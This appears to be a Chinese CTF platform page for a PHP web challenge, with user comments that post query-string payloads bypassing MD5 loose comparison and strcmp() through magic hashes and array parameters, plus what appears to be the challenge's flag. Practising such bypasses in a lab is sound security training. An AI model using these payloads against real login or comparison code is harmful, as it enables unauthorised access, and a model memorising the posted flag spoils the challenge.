前女友WEB 未解决

分数: 30 金币: 3
题目作者: 未知
一  血: chounana
一血奖励: 2金币
解  决: 5698
提  示:
描  述:
来源 山科大ctf
评论
emm不取名字了 4月前

flag{*****}

回复 0

3344 5月前

flag{**********}

回复 0

Arya32f 5月前

/?v1=QNKCDZO&v2=240610708&v3[]=1或者/?v1[]=1&v2[]=2&v3[]=1

回复 0

HK1ng 5月前

首先CTRL+U查看源码,发现存在超链接,点击进去之后,代码审计,第一关是md5弱类型比较,然后用了strcmp()函数进行弱类型比较,直接传一个数组,PHP 8.0 前 strcmp() 会返回 null,加上取反,直接绕过。

回复 2

goodsnack 6月前

弱类型比较,传数组即可

回复 0

harven 6月前

http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test

回复 0

smtall 6月前

用deepseek做出来了

回复 2

大棕兔爸爸 7月前

存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc

回复 1

welltian 9月前

/?v1=QNKCDZO&v2=240610708&v3[]=123

回复 0

33555 9月前

/?v1[]=1&v2[]=2&v3[]=1flag{f78a31880b6bf8800597a997e130155f}

回复 0

WriteUp

image
harry

3 金币

评分(12)

解题动态

Julia 攻破了该题 2小时前
没有伞的小白帽 攻破了该题 5小时前
17361232956 攻破了该题 6小时前
楼主甜甜圈 攻破了该题 9小时前
hahahahahahaha 攻破了该题 9小时前
orange2015 攻破了该题 1天前
hanzkj 攻破了该题 1天前
xiemeimei 攻破了该题 1天前
malx 攻破了该题 1天前
desireart 攻破了该题 1天前
2757547892 攻破了该题 2天前
要加两个蛋 攻破了该题 2天前
zcgzcx1234 攻破了该题 2天前
yjyyds 攻破了该题 2天前
walkerming 攻破了该题 3天前
欲语泪先流 攻破了该题 3天前
吴王饭差 攻破了该题 3天前
1234567nxb 攻破了该题 3天前
kzlkzl 攻破了该题 3天前
huangyujie 攻破了该题 4天前
问题反馈